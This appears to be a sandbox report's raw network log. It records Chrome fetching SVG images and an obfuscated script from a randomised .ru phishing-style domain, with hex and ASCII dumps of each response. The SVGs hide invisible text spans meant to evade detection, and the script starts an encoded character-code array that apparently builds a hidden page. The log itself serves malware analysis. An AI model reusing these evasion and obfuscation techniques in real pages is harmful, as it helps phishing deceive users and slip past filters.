                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC766OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQ HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:15 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:15 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=blxl40Y0AY0tqccreoLyJ7q9BXSwaLqtP6q75V8afkYSDni9AMMkU0TGVT7GhbVGgpp1wqYxjZ4G0d%2FKEo%2BYhYmw%2Fkk0dUhd4fzVo%2FXz6AxB956UZsjTzTpDsW%2B4mViPZPSBPeBozY55XRU1W7TQVI6sebs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d99ec5b44f7-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:15 UTC645INData Raw: 34 31 61 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 79 6a 55 43 71 70 67 38 7a 70 31 38 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                                                                                                                                                    Data Ascii: 41a<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">yjUCqpg8zp18</span><span style="display: inlin
                                                                                                                                                                                    2024-01-26 13:42:15 UTC412INData Raw: 37 2e 36 31 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34
                                                                                                                                                                                    Data Ascii: 7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#4
                                                                                                                                                                                    2024-01-26 13:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    67192.168.2.1649816104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC760OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urr HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:15 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:15 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sdYrbkMomoDr6HImdrgeR3iea8nmQmpFYdAESVi8aUIjzuo%2FChb8xfl2uG7Ka9oYgBwRwjuzFgPY%2FKzAnmunSkAY7xFKrcOhmFcrZqmZsz3aX4lgNJzF5JTKF3RRDsZTojRV9ZkDSJRzLNUgmxhOOZdHMV4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d99eb5ab16b-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:15 UTC651INData Raw: 31 38 32 31 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 77 36 63 38 57 32 51 43 6d 68 72 30 50 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79
                                                                                                                                                                                    Data Ascii: 1821<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">w6c8W2QCmhr0P</text><g opacity=".2" clip-path="url(#E)"><text sty
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 32 30 71 74 37 6b 67 35 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22 20 66
                                                                                                                                                                                    Data Ascii: t style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">20qt7kg5</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" f
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 5a 57 4f 34 67 32 62 5a 71 46 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                                                    Data Ascii: gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZWO4g2bZqF</text><text style="display: inli
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 5a 69 36 6a 72 6b 46 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 33 61 73 6f 77 68 4b 71 48 56 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20
                                                                                                                                                                                    Data Ascii: Zi6jrkF</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">3asowhKqHV</text></radialGradient><text style="display: inline; color: #1A7D75;
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 32 66 4f 4d 79 79 6a 4b 51 37 32 49 30 6a 63 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
                                                                                                                                                                                    Data Ascii: p stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">2fOMyyjKQ72I0jc</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline;
                                                                                                                                                                                    2024-01-26 13:42:15 UTC58INData Raw: 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 71 4b 64 32 68 68 51 30 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: eight: 0.03px; font-size: 0.02px;">qKd2hhQ0</text></svg>
                                                                                                                                                                                    2024-01-26 13:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    68192.168.2.1649817104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC771OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6py3MCJoa2541Lb6/6Q7zPL1PIdTL1B HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:15 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:15 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9UcAbYrDBrXJENEJAtLPVHtA0UobjMhWDotu3h75pCrXV5lLMp%2Bg9SZCpthXPrbEkT7TseHkpF5E2XShxeYCkIeejtQviIPAqXkzRzgZseeKdl%2FIidWGnx3wbNZGqeW3PN1KMCISSq5%2BM65%2FG4q4dKluA0k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d99fe5b458e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:15 UTC647INData Raw: 39 39 31 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 75 5a 76 30 33 71 33 6b 50 46 51 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: 991<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">uZv03q3kPFQ</text><span style="display: inline
                                                                                                                                                                                    2024-01-26 13:42:15 UTC1369INData Raw: 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 32 64 36 58 50 45 78 5a 48 36 77 34 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32 31
                                                                                                                                                                                    Data Ascii: , 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">2d6XPExZH6w4</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.21
                                                                                                                                                                                    2024-01-26 13:42:15 UTC440INData Raw: 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78
                                                                                                                                                                                    Data Ascii: -.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px
                                                                                                                                                                                    2024-01-26 13:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    69192.168.2.1649818104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:15 UTC764OUTGET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:15 UTC736INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:15 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J6INb0GlszmL0JIrkCT17FYWH1Y%2BREyu9mcT7K3YGxjFeKXIVy8zLTUvi7B1ftY6pucKriZQj3Nz9DDLDEzxLdImhCfFBisdhTjRWJ4wqFKSGF55BoS%2Big9LgNw2L%2BrPqRCJwqSXns44k3PSB8TdW73QI0k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d9bc849b100-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:15 UTC633INData Raw: 37 63 63 65 0d 0a 76 61 72 20 45 57 52 66 67 76 71 49 6a 4c 58 62 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 30 5d 20 3d 20 36 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 31 5d 20 3d 20 33 33 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 32 5d 20 3d 20 36 38 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 33 5d 20 3d 20 37 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 34 5d 20 3d 20 36 37 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 35 5d 20 3d 20 38 34 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 36 5d 20 3d 20 38 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 37 5d 20 3d 20 38 30 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 38 5d 20 3d 20 36 39 3b 0a 45 57 52 66 67 76 71 49 6a 4c 58 62 5b 39 5d 20 3d 20 33 32 3b
                                                                                                                                                                                    Data Ascii: 7ccevar EWRfgvqIjLXb = new Array;EWRfgvqIjLXb[0] = 60;EWRfgvqIjLXb[1] = 33;EWRfgvqIjLXb[2] = 68;EWRfgvqIjLXb[3] = 79;EWRfgvqIjLXb[4] = 67;EWRfgvqIjLXb[5] = 84;EWRfgvqIjLXb[6] = 89;EWRfgvqIjLXb[7] = 80;EWRfgvqIjLXb[8] = 69;EWRfgvqIjLXb[9] = 32;
